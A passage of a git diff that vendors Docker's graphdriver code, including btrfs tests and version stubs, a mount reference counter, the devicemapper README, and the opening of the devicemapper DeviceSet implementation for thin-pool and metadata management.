+	if err != nil {
+		t.Fatal(err)
+	}
+	defer d.Put("test")
+
+	if err := subvolCreate(dir, "subvoltest"); err != nil {
+		t.Fatal(err)
+	}
+
+	if _, err := os.Stat(path.Join(dir, "subvoltest")); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := d.Remove("test"); err != nil {
+		t.Fatal(err)
+	}
+
+	if _, err := os.Stat(path.Join(dir, "subvoltest")); !os.IsNotExist(err) {
+		t.Fatalf("expected not exist error on nested subvol, got: %v", err)
+	}
+}
+
+func TestBtrfsTeardown(t *testing.T) {
+	graphtest.PutDriver(t)
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/dummy_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/dummy_unsupported.go
new file mode 100644
index 0000000000..f07088887a
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/dummy_unsupported.go
@@ -0,0 +1,3 @@
+// +build !linux !cgo
+
+package btrfs
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version.go b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version.go
new file mode 100644
index 0000000000..73d90cdd71
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version.go
@@ -0,0 +1,26 @@
+// +build linux,!btrfs_noversion
+
+package btrfs
+
+/*
+#include <btrfs/version.h>
+
+// around version 3.16, they did not define lib version yet
+#ifndef BTRFS_LIB_VERSION
+#define BTRFS_LIB_VERSION -1
+#endif
+
+// upstream had removed it, but now it will be coming back
+#ifndef BTRFS_BUILD_VERSION
+#define BTRFS_BUILD_VERSION "-"
+#endif
+*/
+import "C"
+
+func btrfsBuildVersion() string {
+	return string(C.BTRFS_BUILD_VERSION)
+}
+
+func btrfsLibVersion() int {
+	return int(C.BTRFS_LIB_VERSION)
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_none.go b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_none.go
new file mode 100644
index 0000000000..f802fbc629
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_none.go
@@ -0,0 +1,14 @@
+// +build linux,btrfs_noversion
+
+package btrfs
+
+// TODO(vbatts) remove this work-around once supported linux distros are on
+// btrfs utilities of >= 3.16.1
+
+func btrfsBuildVersion() string {
+	return "-"
+}
+
+func btrfsLibVersion() int {
+	return -1
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_test.go
new file mode 100644
index 0000000000..15a6e75cb3
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_test.go
@@ -0,0 +1,13 @@
+// +build linux,!btrfs_noversion
+
+package btrfs
+
+import (
+	"testing"
+)
+
+func TestLibVersion(t *testing.T) {
+	if btrfsLibVersion() <= 0 {
+		t.Errorf("expected output from btrfs lib version > 0")
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/counter.go b/vendor/github.com/docker/docker/daemon/graphdriver/counter.go
new file mode 100644
index 0000000000..5ea604f5b6
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/counter.go
@@ -0,0 +1,67 @@
+package graphdriver
+
+import "sync"
+
+type minfo struct {
+	check bool
+	count int
+}
+
+// RefCounter is a generic counter for use by graphdriver Get/Put calls
+type RefCounter struct {
+	counts  map[string]*minfo
+	mu      sync.Mutex
+	checker Checker
+}
+
+// NewRefCounter returns a new RefCounter
+func NewRefCounter(c Checker) *RefCounter {
+	return &RefCounter{
+		checker: c,
+		counts:  make(map[string]*minfo),
+	}
+}
+
+// Increment increaes the ref count for the given id and returns the current count
+func (c *RefCounter) Increment(path string) int {
+	c.mu.Lock()
+	m := c.counts[path]
+	if m == nil {
+		m = &minfo{}
+		c.counts[path] = m
+	}
+	// if we are checking this path for the first time check to make sure
+	// if it was already mounted on the system and make sure we have a correct ref
+	// count if it is mounted as it is in use.
+	if !m.check {
+		m.check = true
+		if c.checker.IsMounted(path) {
+			m.count++
+		}
+	}
+	m.count++
+	c.mu.Unlock()
+	return m.count
+}
+
+// Decrement decreases the ref count for the given id and returns the current count
+func (c *RefCounter) Decrement(path string) int {
+	c.mu.Lock()
+	m := c.counts[path]
+	if m == nil {
+		m = &minfo{}
+		c.counts[path] = m
+	}
+	// if we are checking this path for the first time check to make sure
+	// if it was already mounted on the system and make sure we have a correct ref
+	// count if it is mounted as it is in use.
+	if !m.check {
+		m.check = true
+		if c.checker.IsMounted(path) {
+			m.count++
+		}
+	}
+	m.count--
+	c.mu.Unlock()
+	return m.count
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/README.md b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/README.md
new file mode 100644
index 0000000000..b23bbb107a
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/README.md
@@ -0,0 +1,96 @@
+## devicemapper - a storage backend based on Device Mapper
+
+### Theory of operation
+
+The device mapper graphdriver uses the device mapper thin provisioning
+module (dm-thinp) to implement CoW snapshots. The preferred model is
+to have a thin pool reserved outside of Docker and passed to the
+daemon via the `--storage-opt dm.thinpooldev` option.
+
+As a fallback if no thin pool is provided, loopback files will be
+created.  Loopback is very slow, but can be used without any
+pre-configuration of storage.  It is strongly recommended that you do
+not use loopback in production.  Ensure your Docker daemon has a
+`--storage-opt dm.thinpooldev` argument provided.
+
+In loopback, a thin pool is created at `/var/lib/docker/devicemapper`
+(devicemapper graph location) based on two block devices, one for
+data and one for metadata. By default these block devices are created
+automatically by using loopback mounts of automatically created sparse
+files.
+
+The default loopback files used are
+`/var/lib/docker/devicemapper/devicemapper/data` and
+`/var/lib/docker/devicemapper/devicemapper/metadata`. Additional metadata
+required to map from docker entities to the corresponding devicemapper
+volumes is stored in the `/var/lib/docker/devicemapper/devicemapper/json`
+file (encoded as Json).
+
+In order to support multiple devicemapper graphs on a system, the thin
+pool will be named something like: `docker-0:33-19478248-pool`, where
+the `0:33` part is the minor/major device nr and `19478248` is the
+inode number of the `/var/lib/docker/devicemapper` directory.
+
+On the thin pool, docker automatically creates a base thin device,
+called something like `docker-0:33-19478248-base` of a fixed
+size. This is automatically formatted with an empty filesystem on
+creation. This device is the base of all docker images and
+containers. All base images are snapshots of this device and those
+images are then in turn used as snapshots for other images and
+eventually containers.
+
+### Information on `docker info`
+
+As of docker-1.4.1, `docker info` when using the `devicemapper` storage driver
+will display something like:
+
+	$ sudo docker info
+	[...]
+	Storage Driver: devicemapper
+	 Pool Name: docker-253:1-17538953-pool
+	 Pool Blocksize: 65.54 kB
+	 Base Device Size: 107.4 GB
+	 Data file: /dev/loop4
+	 Metadata file: /dev/loop4
+	 Data Space Used: 2.536 GB
+	 Data Space Total: 107.4 GB
+	 Data Space Available: 104.8 GB
+	 Metadata Space Used: 7.93 MB
+	 Metadata Space Total: 2.147 GB
+	 Metadata Space Available: 2.14 GB
+	 Udev Sync Supported: true
+	 Data loop file: /home/docker/devicemapper/devicemapper/data
+	 Metadata loop file: /home/docker/devicemapper/devicemapper/metadata
+	 Library Version: 1.02.82-git (2013-10-04)
+	[...]
+
+#### status items
+
+Each item in the indented section under `Storage Driver: devicemapper` are
+status information about the driver.
+ *  `Pool Name` name of the devicemapper pool for this driver.
+ *  `Pool Blocksize` tells the blocksize the thin pool was initialized with. This only changes on creation.
+ *  `Base Device Size` tells the maximum size of a container and image
+ *  `Data file` blockdevice file used for the devicemapper data
+ *  `Metadata file` blockdevice file used for the devicemapper metadata
+ *  `Data Space Used` tells how much of `Data file` is currently used
+ *  `Data Space Total` tells max size the `Data file`
+ *  `Data Space Available` tells how much free space there is in the `Data file`. If you are using a loop device this will report the actual space available to the loop device on the underlying filesystem.
+ *  `Metadata Space Used` tells how much of `Metadata file` is currently used
+ *  `Metadata Space Total` tells max size the `Metadata file`
+ *  `Metadata Space Available` tells how much free space there is in the `Metadata file`. If you are using a loop device this will report the actual space available to the loop device on the underlying filesystem.
+ *  `Udev Sync Supported` tells whether devicemapper is able to sync with Udev. Should be `true`.
+ *  `Data loop file` file attached to `Data file`, if loopback device is used
+ *  `Metadata loop file` file attached to `Metadata file`, if loopback device is used
+ *  `Library Version` from the libdevmapper used
+
+### About the devicemapper options
+
+The devicemapper backend supports some options that you can specify
+when starting the docker daemon using the `--storage-opt` flags.
+This uses the `dm` prefix and would be used something like `docker daemon --storage-opt dm.foo=bar`.
+
+These options are currently documented both in [the man
+page](../../../man/docker.1.md) and in [the online
+documentation](https://docs.docker.com/engine/reference/commandline/dockerd/#/storage-driver-options).
+If you add an options, update both the `man` page and the documentation.
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/deviceset.go b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/deviceset.go
new file mode 100644
index 0000000000..b8e762592c
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/deviceset.go
@@ -0,0 +1,2727 @@
+// +build linux
+
+package devmapper
+
+import (
+	"bufio"
+	"encoding/json"
+	"errors"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"os"
+	"os/exec"
+	"path"
+	"path/filepath"
+	"strconv"
+	"strings"
+	"sync"
+	"syscall"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+
+	"github.com/docker/docker/daemon/graphdriver"
+	"github.com/docker/docker/dockerversion"
+	"github.com/docker/docker/pkg/devicemapper"
+	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/pkg/loopback"
+	"github.com/docker/docker/pkg/mount"
+	"github.com/docker/docker/pkg/parsers"
+	"github.com/docker/go-units"
+
+	"github.com/opencontainers/runc/libcontainer/label"
+)
+
+var (
+	defaultDataLoopbackSize     int64  = 100 * 1024 * 1024 * 1024
+	defaultMetaDataLoopbackSize int64  = 2 * 1024 * 1024 * 1024
+	defaultBaseFsSize           uint64 = 10 * 1024 * 1024 * 1024
+	defaultThinpBlockSize       uint32 = 128 // 64K = 128 512b sectors
+	defaultUdevSyncOverride            = false
+	maxDeviceID                        = 0xffffff // 24 bit, pool limit
+	deviceIDMapSz                      = (maxDeviceID + 1) / 8
+	// We retry device removal so many a times that even error messages
+	// will fill up console during normal operation. So only log Fatal
+	// messages by default.
+	logLevel                            = devicemapper.LogLevelFatal
+	driverDeferredRemovalSupport        = false
+	enableDeferredRemoval               = false
+	enableDeferredDeletion              = false
+	userBaseSize                        = false
+	defaultMinFreeSpacePercent   uint32 = 10
+)
+
+const deviceSetMetaFile string = "deviceset-metadata"
+const transactionMetaFile string = "transaction-metadata"
+
+type transaction struct {
+	OpenTransactionID uint64 `json:"open_transaction_id"`
+	DeviceIDHash      string `json:"device_hash"`
+	DeviceID          int    `json:"device_id"`
+}
+
+type devInfo struct {
+	Hash          string `json:"-"`
+	DeviceID      int    `json:"device_id"`
+	Size          uint64 `json:"size"`
+	TransactionID uint64 `json:"transaction_id"`
+	Initialized   bool   `json:"initialized"`
+	Deleted       bool   `json:"deleted"`
+	devices       *DeviceSet
+
+	// The global DeviceSet lock guarantees that we serialize all
+	// the calls to libdevmapper (which is not threadsafe), but we
+	// sometimes release that lock while sleeping. In that case
+	// this per-device lock is still held, protecting against
+	// other accesses to the device that we're doing the wait on.
+	//
+	// WARNING: In order to avoid AB-BA deadlocks when releasing
+	// the global lock while holding the per-device locks all
+	// device locks must be acquired *before* the device lock, and
+	// multiple device locks should be acquired parent before child.
+	lock sync.Mutex
+}
+
+type metaData struct {
+	Devices map[string]*devInfo `json:"Devices"`
+}
+
+// DeviceSet holds information about list of devices
+type DeviceSet struct {
+	metaData      `json:"-"`
+	sync.Mutex    `json:"-"` // Protects all fields of DeviceSet and serializes calls into libdevmapper
+	root          string
+	devicePrefix  string
+	TransactionID uint64 `json:"-"`
+	NextDeviceID  int    `json:"next_device_id"`
+	deviceIDMap   []byte
+
+	// Options
+	dataLoopbackSize      int64
+	metaDataLoopbackSize  int64
+	baseFsSize            uint64
+	filesystem            string
+	mountOptions          string
+	mkfsArgs              []string
+	dataDevice            string // block or loop dev
+	dataLoopFile          string // loopback file, if used
+	metadataDevice        string // block or loop dev
+	metadataLoopFile      string // loopback file, if used
+	doBlkDiscard          bool
+	thinpBlockSize        uint32
+	thinPoolDevice        string
+	transaction           `json:"-"`
+	overrideUdevSyncCheck bool
+	deferredRemove        bool   // use deferred removal
+	deferredDelete        bool   // use deferred deletion
+	BaseDeviceUUID        string // save UUID of base device
+	BaseDeviceFilesystem  string // save filesystem of base device
+	nrDeletedDevices      uint   // number of deleted devices
+	deletionWorkerTicker  *time.Ticker
+	uidMaps               []idtools.IDMap
+	gidMaps               []idtools.IDMap
+	minFreeSpacePercent   uint32 //min free space percentage in thinpool
+	xfsNospaceRetries     string // max retries when xfs receives ENOSPC
+}
+
+// DiskUsage contains information about disk usage and is used when reporting Status of a device.
+type DiskUsage struct {
+	// Used bytes on the disk.
+	Used uint64
+	// Total bytes on the disk.
+	Total uint64
+	// Available bytes on the disk.
+	Available uint64
+}
+
+// Status returns the information about the device.
+type Status struct {
+	// PoolName is the name of the data pool.
+	PoolName string
+	// DataFile is the actual block device for data.
+	DataFile string
+	// DataLoopback loopback file, if used.
+	DataLoopback string
+	// MetadataFile is the actual block device for metadata.
+	MetadataFile string
+	// MetadataLoopback is the loopback file, if used.
+	MetadataLoopback string
+	// Data is the disk used for data.
+	Data DiskUsage
+	// Metadata is the disk used for meta data.
+	Metadata DiskUsage
+	// BaseDeviceSize is base size of container and image
+	BaseDeviceSize uint64
+	// BaseDeviceFS is backing filesystem.
+	BaseDeviceFS string
+	// SectorSize size of the vector.
+	SectorSize uint64
+	// UdevSyncSupported is true if sync is supported.
+	UdevSyncSupported bool
+	// DeferredRemoveEnabled is true then the device is not unmounted.
+	DeferredRemoveEnabled bool
+	// True if deferred deletion is enabled. This is different from
+	// deferred removal. "removal" means that device mapper device is
+	// deactivated. Thin device is still in thin pool and can be activated
+	// again. But "deletion" means that thin device will be deleted from
+	// thin pool and it can't be activated again.
+	DeferredDeleteEnabled      bool
+	DeferredDeletedDeviceCount uint
+	MinFreeSpace               uint64
+}
+
+// Structure used to export image/container metadata in docker inspect.
+type deviceMetadata struct {
+	deviceID   int
+	deviceSize uint64 // size in bytes
+	deviceName string // Device name as used during activation
+}
+
+// DevStatus returns information about device mounted containing its id, size and sector information.
+type DevStatus struct {
+	// DeviceID is the id of the device.
+	DeviceID int
+	// Size is the size of the filesystem.
+	Size uint64
+	// TransactionID is a unique integer per device set used to identify an operation on the file system, this number is incremental.
+	TransactionID uint64
+	// SizeInSectors indicates the size of the sectors allocated.
+	SizeInSectors uint64
+	// MappedSectors indicates number of mapped sectors.
+	MappedSectors uint64
+	// HighestMappedSector is the pointer to the highest mapped sector.
+	HighestMappedSector uint64
+}
+
+func getDevName(name string) string {
+	return "/dev/mapper/" + name
+}
+
+func (info *devInfo) Name() string {
+	hash := info.Hash
+	if hash == "" {
+		hash = "base"
+	}
+	return fmt.Sprintf("%s-%s", info.devices.devicePrefix, hash)
+}
+
+func (info *devInfo) DevName() string {
+	return getDevName(info.Name())
+}
+
+func (devices *DeviceSet) loopbackDir() string {
+	return path.Join(devices.root, "devicemapper")
+}
+
+func (devices *DeviceSet) metadataDir() string {
+	return path.Join(devices.root, "metadata")
+}
+
+func (devices *DeviceSet) metadataFile(info *devInfo) string {
+	file := info.Hash
+	if file == "" {
+		file = "base"
+	}
+	return path.Join(devices.metadataDir(), file)
+}
+
+func (devices *DeviceSet) transactionMetaFile() string {
+	return path.Join(devices.metadataDir(), transactionMetaFile)
+}
+
+func (devices *DeviceSet) deviceSetMetaFile() string {
+	return path.Join(devices.metadataDir(), deviceSetMetaFile)
+}
+
+func (devices *DeviceSet) oldMetadataFile() string {
+	return path.Join(devices.loopbackDir(), "json")
+}
+
+func (devices *DeviceSet) getPoolName() string {
+	if devices.thinPoolDevice == "" {
+		return devices.devicePrefix + "-pool"
+	}
+	return devices.thinPoolDevice
+}
+
+func (devices *DeviceSet) getPoolDevName() string {
+	return getDevName(devices.getPoolName())
+}
+
+func (devices *DeviceSet) hasImage(name string) bool {
+	dirname := devices.loopbackDir()
+	filename := path.Join(dirname, name)
+
+	_, err := os.Stat(filename)
+	return err == nil
+}
+
+// ensureImage creates a sparse file of <size> bytes at the path
+// <root>/devicemapper/<name>.
+// If the file already exists and new size is larger than its current size, it grows to the new size.
+// Either way it returns the full path.
+func (devices *DeviceSet) ensureImage(name string, size int64) (string, error) {
+	dirname := devices.loopbackDir()
+	filename := path.Join(dirname, name)
+
+	uid, gid, err := idtools.GetRootUIDGID(devices.uidMaps, devices.gidMaps)
+	if err != nil {
+		return "", err
+	}
+	if err := idtools.MkdirAllAs(dirname, 0700, uid, gid); err != nil && !os.IsExist(err) {
+		return "", err
+	}
+
+	if fi, err := os.Stat(filename); err != nil {
+		if !os.IsNotExist(err) {
+			return "", err
+		}
+		logrus.Debugf("devmapper: Creating loopback file %s for device-manage use", filename)
+		file, err := os.OpenFile(filename, os.O_RDWR|os.O_CREATE, 0600)
+		if err != nil {
+			return "", err
+		}
+		defer file.Close()
+
+		if err := file.Truncate(size); err != nil {
+			return "", err
+		}
+	} else {
+		if fi.Size() < size {
+			file, err := os.OpenFile(filename, os.O_RDWR|os.O_CREATE, 0600)
+			if err != nil {
+				return "", err
+			}
+			defer file.Close()
+			if err := file.Truncate(size); err != nil {
+				return "", fmt.Errorf("devmapper: Unable to grow loopback file %s: %v", filename, err)
+			}
+		} else if fi.Size() > size {
+			logrus.Warnf("devmapper: Can't shrink loopback file %s", filename)
+		}
+	}
+	return filename, nil
+}
+
+func (devices *DeviceSet) allocateTransactionID() uint64 {
+	devices.OpenTransactionID = devices.TransactionID + 1
+	return devices.OpenTransactionID
+}
+
+func (devices *DeviceSet) updatePoolTransactionID() error {
+	if err := devicemapper.SetTransactionID(devices.getPoolDevName(), devices.TransactionID, devices.OpenTransactionID); err != nil {
+		return fmt.Errorf("devmapper: Error setting devmapper transaction ID: %s", err)
+	}
+	devices.TransactionID = devices.OpenTransactionID
+	return nil
+}
+
+func (devices *DeviceSet) removeMetadata(info *devInfo) error {
+	if err := os.RemoveAll(devices.metadataFile(info)); err != nil {
+		return fmt.Errorf("devmapper: Error removing metadata file %s: %s", devices.metadataFile(info), err)
+	}
+	return nil
+}
+
+// Given json data and file path, write it to disk
+func (devices *DeviceSet) writeMetaFile(jsonData []byte, filePath string) error {
+	tmpFile, err := ioutil.TempFile(devices.metadataDir(), ".tmp")
+	if err != nil {
+		return fmt.Errorf("devmapper: Error creating metadata file: %s", err)
+	}
+
+	n, err := tmpFile.Write(jsonData)
+	if err != nil {
+		return fmt.Errorf("devmapper: Error writing metadata to %s: %s", tmpFile.Name(), err)
+	}
+	if n < len(jsonData) {
+		return io.ErrShortWrite
+	}
+	if err := tmpFile.Sync(); err != nil {
+		return fmt.Errorf("devmapper: Error syncing metadata file %s: %s", tmpFile.Name(), err)
+	}
+	if err := tmpFile.Close(); err != nil {
+		return fmt.Errorf("devmapper: Error closing metadata file %s: %s", tmpFile.Name(), err)
+	}
+	if err := os.Rename(tmpFile.Name(), filePath); err != nil {
+		return fmt.Errorf("devmapper: Error committing metadata file %s: %s", tmpFile.Name(), err)
+	}
+
+	return nil
+}
+
+func (devices *DeviceSet) saveMetadata(info *devInfo) error {
+	jsonData, err := json.Marshal(info)
+	if err != nil {
+		return fmt.Errorf("devmapper: Error encoding metadata to json: %s", err)
+	}
+	if err := devices.writeMetaFile(jsonData, devices.metadataFile(info)); err != nil {
+		return err
+	}
+	return nil
+}
+
+func (devices *DeviceSet) markDeviceIDUsed(deviceID int) {
+	var mask byte
+	i := deviceID % 8
+	mask = 1 << uint(i)
+	devices.deviceIDMap[deviceID/8] = devices.deviceIDMap[deviceID/8] | mask
+}
+
+func (devices *DeviceSet) markDeviceIDFree(deviceID int) {
+	var mask byte
+	i := deviceID % 8
+	mask = ^(1 << uint(i))
+	devices.deviceIDMap[deviceID/8] = devices.deviceIDMap[deviceID/8] & mask
+}
+
+func (devices *DeviceSet) isDeviceIDFree(deviceID int) bool {
+	var mask byte
+	i := deviceID % 8
+	mask = (1 << uint(i))
+	if (devices.deviceIDMap[deviceID/8] & mask) != 0 {
+		return false
+	}
+	return true
+}
+
+// Should be called with devices.Lock() held.
+func (devices *DeviceSet) lookupDevice(hash string) (*devInfo, error) {
+	info := devices.Devices[hash]
+	if info == nil {
+		info = devices.loadMetadata(hash)
+		if info == nil {
+			return nil, fmt.Errorf("devmapper: Unknown device %s", hash)
+		}
+
+		devices.Devices[hash] = info
+	}
+	return info, nil
+}
+
+func (devices *DeviceSet) lookupDeviceWithLock(hash string) (*devInfo, error) {
+	devices.Lock()
+	defer devices.Unlock()
+	info, err := devices.lookupDevice(hash)
+	return info, err
+}
+
+// This function relies on that device hash map has been loaded in advance.
+// Should be called with devices.Lock() held.
+func (devices *DeviceSet) constructDeviceIDMap() {
+	logrus.Debug("devmapper: constructDeviceIDMap()")
+	defer logrus.Debug("devmapper: constructDeviceIDMap() END")
+
+	for _, info := range devices.Devices {
+		devices.markDeviceIDUsed(info.DeviceID)
+		logrus.Debugf("devmapper: Added deviceId=%d to DeviceIdMap", info.DeviceID)
+	}
+}
+
+func (devices *DeviceSet) deviceFileWalkFunction(path string, finfo os.FileInfo) error {
+
+	// Skip some of the meta files which are not device files.
+	if strings.HasSuffix(finfo.Name(), ".migrated") {
+		logrus.Debugf("devmapper: Skipping file %s", path)
+		return nil
+	}
+
+	if strings.HasPrefix(finfo.Name(), ".") {
+		logrus.Debugf("devmapper: Skipping file %s", path)
+		return nil
+	}
+
+	if finfo.Name() == deviceSetMetaFile {
+		logrus.Debugf("devmapper: Skipping file %s", path)
+		return nil
+	}
+
+	if finfo.Name() == transactionMetaFile {
+		logrus.Debugf("devmapper: Skipping file %s", path)
+		return nil
+	}
+
+	logrus.Debugf("devmapper: Loading data for file %s", path)
+
+	hash := finfo.Name()
+	if hash == "base" {
+		hash = ""
+	}
+
+	// Include deleted devices also as cleanup delete device logic
+	// will go through it and see if there are any deleted devices.
+	if _, err := devices.lookupDevice(hash); err != nil {
+		return fmt.Errorf("devmapper: Error looking up device %s:%v", hash, err)
+	}
+
+	return nil
+}
+
+func (devices *DeviceSet) loadDeviceFilesOnStart() error {
+	logrus.Debug("devmapper: loadDeviceFilesOnStart()")
+	defer logrus.Debug("devmapper: loadDeviceFilesOnStart() END")
+
+	var scan = func(path string, info os.FileInfo, err error) error {
+		if err != nil {
+			logrus.Debugf("devmapper: Can't walk the file %s", path)
+			return nil
+		}
+
+		// Skip any directories
+		if info.IsDir() {
+			return nil
+		}
+
+		return devices.deviceFileWalkFunction(path, info)
+	}
+
+	return filepath.Walk(devices.metadataDir(), scan)
+}
+
+// Should be called with devices.Lock() held.
+func (devices *DeviceSet) unregisterDevice(id int, hash string) error {
+	logrus.Debugf("devmapper: unregisterDevice(%v, %v)", id, hash)
+	info := &devInfo{
+		Hash:     hash,
+		DeviceID: id,
+	}
+
+	delete(devices.Devices, hash)
+
+	if err := devices.removeMetadata(info); err != nil {
+		logrus.Debugf("devmapper: Error removing metadata: %s", err)
+		return err
+	}
+
+	return nil
+}
+
+// Should be called with devices.Lock() held.
+func (devices *DeviceSet) registerDevice(id int, hash string, size uint64, transactionID uint64) (*devInfo, error) {
+	logrus.Debugf("devmapper: registerDevice(%v, %v)", id, hash)
+	info := &devInfo{
+		Hash:          hash,
+		DeviceID:      id,
+		Size:          size,
+		TransactionID: transactionID,
+		Initialized:   false,
+		devices:       devices,
+	}
+
+	devices.Devices[hash] = info
+
+	if err := devices.saveMetadata(info); err != nil {
+		// Try to remove unused device
+		delete(devices.Devices, hash)
+		return nil, err
+	}
+
+	return info, nil
+}
+
+func (devices *DeviceSet) activateDeviceIfNeeded(info *devInfo, ignoreDeleted bool) error {
+	logrus.Debugf("devmapper: activateDeviceIfNeeded(%v)", info.Hash)
+
+	if info.Deleted && !ignoreDeleted {
+		return fmt.Errorf("devmapper: Can't activate device %v as it is marked for deletion", info.Hash)
+	}
+
+	// Make sure deferred removal on device is canceled, if one was
+	// scheduled.
+	if err := devices.cancelDeferredRemovalIfNeeded(info); err != nil {
+		return fmt.Errorf("devmapper: Device Deferred Removal Cancellation Failed: %s", err)
+	}
+
+	if devinfo, _ := devicemapper.GetInfo(info.Name()); devinfo != nil && devinfo.Exists != 0 {
+		return nil
+	}
+
+	return devicemapper.ActivateDevice(devices.getPoolDevName(), info.Name(), info.DeviceID, info.Size)
+}
+
+// Return true only if kernel supports xfs and mkfs.xfs is available
+func xfsSupported() bool {
+	// Make sure mkfs.xfs is available
+	if _, err := exec.LookPath("mkfs.xfs"); err != nil {
+		return false
+	}
+
+	// Check if kernel supports xfs filesystem or not.
+	exec.Command("modprobe", "xfs").Run()
+
+	f, err := os.Open("/proc/filesystems")
+	if err != nil {
+		logrus.Warnf("devmapper: Could not check if xfs is supported: %v", err)
+		return false
+	}
+	defer f.Close()
+
+	s := bufio.NewScanner(f)
+	for s.Scan() {
+		if strings.HasSuffix(s.Text(), "\txfs") {
+			return true
+		}
+	}
+
+	if err := s.Err(); err != nil {
+		logrus.Warnf("devmapper: Could not check if xfs is supported: %v", err)
+	}
+	return false
+}
+
+func determineDefaultFS() string {
+	if xfsSupported() {
+		return "xfs"
+	}
+
+	logrus.Warn("devmapper: XFS is not supported in your system. Either the kernel doesn't support it or mkfs.xfs is not in your PATH. Defaulting to ext4 filesystem")
+	return "ext4"
+}
+
+func (devices *DeviceSet) createFilesystem(info *devInfo) (err error) {
+	devname := info.DevName()
+
+	args := []string{}
+	args = append(args, devices.mkfsArgs...)
+
+	args = append(args, devname)
+
+	if devices.filesystem == "" {
+		devices.filesystem = determineDefaultFS()
+	}
+	if err := devices.saveBaseDeviceFilesystem(devices.filesystem); err != nil {
+		return err
+	}
+
+	logrus.Infof("devmapper: Creating filesystem %s on device %s", devices.filesystem, info.Name())
+	defer func() {
+		if err != nil {
+			logrus.Infof("devmapper: Error while creating filesystem %s on device %s: %v", devices.filesystem, info.Name(), err)
+		} else {
+			logrus.Infof("devmapper: Successfully created filesystem %s on device %s", devices.filesystem, info.Name())
+		}
+	}()
+
+	switch devices.filesystem {
+	case "xfs":
+		err = exec.Command("mkfs.xfs", args...).Run()
+	case "ext4":
+		err = exec.Command("mkfs.ext4", append([]string{"-E", "nodiscard,lazy_itable_init=0,lazy_journal_init=0"}, args...)...).Run()
+		if err != nil {
+			err = exec.Command("mkfs.ext4", append([]string{"-E", "nodiscard,lazy_itable_init=0"}, args...)...).Run()
+		}
+		if err != nil {
+			return err
+		}
+		err = exec.Command("tune2fs", append([]string{"-c", "-1", "-i", "0"}, devname)...).Run()
+	default:
+		err = fmt.Errorf("devmapper: Unsupported filesystem type %s", devices.filesystem)
+	}
+	return
+}
+
+func (devices *DeviceSet) migrateOldMetaData() error {
+	// Migrate old metadata file
+	jsonData, err := ioutil.ReadFile(devices.oldMetadataFile())
+	if err != nil && !os.IsNotExist(err) {
+		return err
+	}
+
+	if jsonData != nil {
+		m := metaData{Devices: make(map[string]*devInfo)}
+
+		if err := json.Unmarshal(jsonData, &m); err != nil {
+			return err
+		}
+
+		for hash, info := range m.Devices {
+			info.Hash = hash
+			devices.saveMetadata(info)
+		}
+		if err := os.Rename(devices.oldMetadataFile(), devices.oldMetadataFile()+".migrated"); err != nil {
+			return err
+		}
+
+	}
+
+	return nil
+}
+
+// Cleanup deleted devices. It assumes that all the devices have been
+// loaded in the hash table.
+func (devices *DeviceSet) cleanupDeletedDevices() error {
+	devices.Lock()
+
+	// If there are no deleted devices, there is nothing to do.
+	if devices.nrDeletedDevices == 0 {
+		devices.Unlock()
+		return nil
+	}
+
+	var deletedDevices []*devInfo
+
+	for _, info := range devices.Devices {
+		if !info.Deleted {
+			continue
+		}
+		logrus.Debugf("devmapper: Found deleted device %s.", info.Hash)
+		deletedDevices = append(deletedDevices, info)
+	}
+
+	// Delete the deleted devices. DeleteDevice() first takes the info lock
+	// and then devices.Lock(). So drop it to avoid deadlock.
+	devices.Unlock()
+
+	for _, info := range deletedDevices {
+		// This will again try deferred deletion.
+		if err := devices.DeleteDevice(info.Hash, false); err != nil {
+			logrus.Warnf("devmapper: Deletion of device %s, device_id=%v failed:%v", info.Hash, info.DeviceID, err)
+		}
+	}
+
+	return nil
+}
+
+func (devices *DeviceSet) countDeletedDevices() {
+	for _, info := range devices.Devices {
+		if !info.Deleted {
+			continue
+		}
+		devices.nrDeletedDevices++
+	}
+}
+
+func (devices *DeviceSet) startDeviceDeletionWorker() {
+	// Deferred deletion is not enabled. Don't do anything.
+	if !devices.deferredDelete {
+		return
+	}
+
+	logrus.Debug("devmapper: Worker to cleanup deleted devices started")
+	for range devices.deletionWorkerTicker.C {
+		devices.cleanupDeletedDevices()
+	}
+}
+
+func (devices *DeviceSet) initMetaData() error {
+	devices.Lock()
+	defer devices.Unlock()
+
+	if err := devices.migrateOldMetaData(); err != nil {
+		return err
+	}
+
+	_, transactionID, _, _, _, _, err := devices.poolStatus()
+	if err != nil {
+		return err
+	}
+
+	devices.TransactionID = transactionID
+
+	if err := devices.loadDeviceFilesOnStart(); err != nil {
+		return fmt.Errorf("devmapper: Failed to load device files:%v", err)
+	}
+
+	devices.constructDeviceIDMap()
+	devices.countDeletedDevices()
+
+	if err := devices.processPendingTransaction(); err != nil {
+		return err
+	}
+
+	// Start a goroutine to cleanup Deleted Devices
+	go devices.startDeviceDeletionWorker()
+	return nil
+}
+
+func (devices *DeviceSet) incNextDeviceID() {
+	// IDs are 24bit, so wrap around
